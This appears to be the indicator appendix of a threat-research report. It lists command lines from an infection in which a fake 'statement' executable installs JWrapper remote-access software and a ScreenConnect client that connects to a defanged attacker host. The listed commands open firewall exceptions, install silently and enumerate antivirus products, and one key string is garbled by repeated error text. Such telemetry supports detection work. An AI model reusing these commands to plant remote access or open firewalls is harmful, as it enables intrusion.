elev_win.exe elev_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\windowslauncher.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar” “-Dsun.java2d.dpiaware=true” “-Djava.library.path=C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete” “com.aem.sdesktop.util.MouseMover” “127.0.0.1” “56936” “127.0.0.1” “56937” “elevated”
elev_win.exe session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe” “–mouselocation”
msiexec.exe Remote Access.exe msiexec.exe /i sc.msi /qn
msiexec.exe services.exe C:\Windows\system32\msiexec.exe /V
msiexec.exe msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 975E1E24ECB9F562B809F458594D14A3 E Global\MSI0000
netsh.exe Remote Access.exe netsh wlan show interfaces
netsh.exe cmd.exe netsh advfirewall show all State
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\java.exe” “SHRemoteAccessServiceJE_2” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\Remote AccessWinLauncher.exe” “SHRemoteAccessServiceMA_1” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “SHRemoteAccessServiceJE_4” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessECompatibility.exe” “SHRemoteAccessServiceJE_5” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessLauncher.exe” “SHRemoteAccessServiceJE_6” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\javaw.exe” “SHRemoteAccessServiceJE_3” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\java-rmi.exe” “SHRemoteAccessServiceJE_1” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\StopSimpleGatewayService.exe” “SHRemoteAccessServiceSH_3_2” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe” “SHRemoteAccessServiceSH_3_1” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\windowslauncher.exe” “SHRemoteAccessServiceJE_7” ENABLE
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777397243979-20”
Remote SimpleGatewayService.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib\jwstandalonelaunch.jar” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-3575002851-22”
Remote statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessECompatibility.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7\JWLaunchProperties-1777396484051-30”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396698592-20”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.JWrapper” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396701404-39”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.JWrapper” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777397247043-39”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396515581-20”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.JWrapper” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396518842-39”
Remote statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396488207-33”
Remote statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessLauncher.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396485879-32”
rundll32.exe msiexec.exe rundll32.exe “C:\Windows\Installer\MSI4209.tmp”,zzzzInvokeManagedCustomActionOutOfProc SfxCA_56509750 2 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
ScreenConnect.ClientService.exe services.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.ClientService.exe” “?e=Access&y=Guest&h=sslzeromail[.]run.place&p=8041&s=1063c106-fb78-4a61-a1c3-959620aa0d1e&k=BgIAAACkAABSU0ExAAgAAAEAAQAtB7xpgSSY0vmCVpwxcuZIThe system cannot find the file specified. fax8SzUK6ZHTngAMzp7yIqVypKK1lThe system cannot find the file specified. bwoyeosThe system cannot find the file specified. b5yThe system cannot find the file specified. fXThe system cannot find the file specified. bEcYDldPOGOThe system cannot find the file specified. b3BseeSeaeo44ykXwdThe system cannot find the file specified. blThe system cannot find the file specified. fa8k24jRIn74Gp2The system cannot find the file specified. b6qNTThe system cannot find the file specified. bpaZaHOThe system cannot find the file specified. fbUva6NBdH5pUcuaDkXzZywacRkvVQa8BOn3uumi7zc0IO44QZboES72PcThe system cannot find the file specified. frxJcuAMThe system cannot find the file specified. f65GGaOEJ4x8ilqcKaquAr0uKFGbaglfYDyCV8kqRaw2L1ucF3The system cannot find the file specified. b22DuwyIwzXd5HwpBsq94euEbHbtNMk4QThe system cannot find the file specified. fDThe system cannot find the file specified. fefxQBPwDqhjWThe system cannot find the file specified. bW2NU99bR16tNqqMbeolXIToecThe system cannot find the file specified. bB9CZ9abJuZES6ULML512IN3phqQZKv&t=&c=crypto&c=&c=&c=&c=&c=&c=&c=”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “87140605-5d2c-4a7d-9c4a-781ac7f07691” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “0d393de2-f5aa-4318-9563-b659faff1a49” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “9dad62c5-42a7-4f31-b383-22ecbad23c7a” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “426d2985-183b-4d41-9abc-f24af794a2db” “User”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “f00ff167-e6f2-44ad-9ccb-e30f6906d0f2” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “1c5eeb04-e194-44a1-b466-87bab51ce23f” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “add529c0-e532-4f23-84dd-6671686c303e” “System”
SecurityHealthSystray.exe explorer.exe “C:\Windows\System32\SecurityHealthSystray.exe”
session_win.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” –slWaitForCompletion “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe” –mouselocation
session_win.exe Remote Access Monitoring.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396518842-39”
session_win.exe Remote Access Monitoring.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396701404-39”
session_win.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.updater.GenericUpdaterLaunch “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777397243979-20”
session_win.exe Remote Access Monitoring.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777397247043-39”
session_win.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.updater.GenericUpdaterLaunch “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396515581-20”
session_win.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.updater.GenericUpdaterLaunch “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396698592-20”
SimpleGatewayService.exe SimpleService.exe “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe”
SimpleService.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe” -uninstall “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\simplegateway.service”
SimpleService.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe” -install “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\simplegateway.service”
SimpleService.exe services.exe “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe”
statement5648.exe explorer.exe “C:\Users\###########\Downloads\statement5648.exe”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\jaccess.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\jaccess.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\rt.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\rt.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\jsse.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\jsse.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\access-bridge-64.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\access-bridge-64.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunec.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunec.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\alt-rt.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\alt-rt.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunmscapi.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunmscapi.jar”
windowslauncher.exe windowslauncher.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\windowslauncher.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Dsun.java2d.dpiaware=true “-Djava.library.path=C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete” com.aem.sdesktop.util.MouseMover 127.0.0.1 56940 127.0.0.1 56941 elevated_backup
windowslauncher.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\windowslauncher.exe” “-Xshare:dump”
wmic.exe Remote Access.exe wmic.exe /namespace:\\root\SecurityCenter2 PATH FirewallProduct get
wmic.exe Remote Access.exe wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get
wmic.exe Remote Access.exe wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiSpywareProduct get
winpty-agent64.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\winpty-agent64.exe” \\.\pipe\winpty-14832-1-control \\.\pipe\winpty-14832-1-data 80 40
winpty-agent64.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\winpty-agent64.exe” \\.\pipe\winpty-2044-1-control \\.\pipe\winpty-2044-1-data 80 40

Related Resource

View all
Threat Intelligence
CHAMELEON#NET: A Deep Dive into Multi-Stage .NET Malware Leveraging Reflective Loading and Custom Decryption for Stealthy Operations
Learn More
Threat Research
Analyzing SERPENTINE#CLOUD: Threat Actors Abuse Cloudflare Tunnels to Infect Systems with Stealthy Python-Based Malware
Learn More
securonix and threat labs logos
Threat Research
Securonix Threat Labs Monthly Intelligence Insights – November 2023
Learn More
securonix and threat labs logos
Threat Research
Securonix Threat Labs Monthly Intelligence Insights – October 2023
Learn More

Securonix 2026. All Rights Reserved Legal Center | Privacy Policy

Contact Us